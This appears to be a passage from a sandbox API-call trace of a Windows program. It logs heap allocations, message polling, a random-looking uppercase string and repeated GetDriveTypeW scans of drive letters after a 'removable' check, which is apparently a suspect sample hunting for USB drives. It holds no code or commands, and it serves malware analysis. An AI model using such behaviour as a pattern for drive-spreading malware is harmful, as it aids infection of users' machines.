RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0214.599] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326160 [0214.599] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0214.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0214.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326160 | out: hHeap=0x12c0000) returned 1 [0214.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0214.600] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e0c0 [0214.600] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e0c0 | out: hHeap=0x12c0000) returned 1 [0214.600] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0214.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0214.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0214.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0214.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0214.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.600] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.600] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0214.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0214.600] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.600] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0214.600] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0214.600] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0214.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0214.600] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd340 [0214.600] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.601] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.601] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0214.601] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.601] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0214.601] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0214.601] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.601] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0214.601] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.601] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.601] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0214.601] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0214.601] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0214.602] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.602] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.602] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.602] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.602] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.602] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.602] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.603] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.603] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.603] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.603] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.604] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.604] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.604] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.604] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.604] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.605] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0214.605] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0214.606] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.606] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.606] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.606] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0214.606] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.606] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.606] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0214.606] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0214.606] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.606] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.606] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.606] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0214.606] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.606] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0214.606] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326160 [0214.606] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.606] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.606] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.606] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.606] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326160 | out: hHeap=0x12c0000) returned 1 [0214.606] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0214.606] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0214.606] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e100 [0214.607] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.607] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e100 | out: hHeap=0x12c0000) returned 1 [0214.607] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.607] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.607] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.607] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0214.607] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.607] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0214.607] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.607] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.607] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.607] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0214.607] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.607] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0214.607] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0214.607] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.607] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0214.607] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.607] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.607] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.607] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0214.608] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0214.608] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.608] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.608] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0214.608] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0214.608] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.608] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0214.608] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.608] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0214.608] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.608] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.608] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0214.608] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0214.608] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0214.608] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.608] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0214.608] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0214.608] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.608] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.608] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0214.608] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.609] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.609] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.609] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0214.609] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.609] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0214.609] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.609] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.609] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0214.609] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.609] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0214.609] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325de0 [0214.609] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0214.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.609] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.609] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0214.609] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325de0 | out: hHeap=0x12c0000) returned 1 [0214.609] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0214.609] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0214.609] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e180 [0214.609] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.609] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e180 | out: hHeap=0x12c0000) returned 1 [0214.609] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.610] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.610] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.610] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0214.610] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0214.610] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.610] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.610] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0214.610] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.610] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.610] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.610] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0214.610] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0214.610] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.610] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0214.610] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.610] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.610] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.610] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0214.610] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0214.610] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0214.610] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.610] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0214.610] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0214.625] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.625] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0214.625] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.625] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0214.625] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0214.625] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0214.625] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0214.625] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0214.625] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0214.625] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.625] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.625] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.625] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.625] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.626] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.626] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.626] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.626] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.626] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.626] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.627] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.627] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.627] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.627] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.627] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.627] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.628] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.628] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.628] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.628] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.628] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.628] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.628] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.629] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.629] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.629] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.629] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0214.629] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0214.629] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.629] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.629] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0214.629] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0214.629] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0214.629] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.629] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0214.629] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.629] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.629] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.629] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.629] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0214.630] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.630] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0214.630] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0214.630] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0214.630] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.630] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.630] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0214.630] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f00 | out: hHeap=0x12c0000) returned 1 [0214.630] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.630] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0214.630] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0214.630] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.630] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0214.630] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.630] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0214.630] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0214.630] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0214.630] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.630] HeapFree (in: hHeap=0x12c0000, 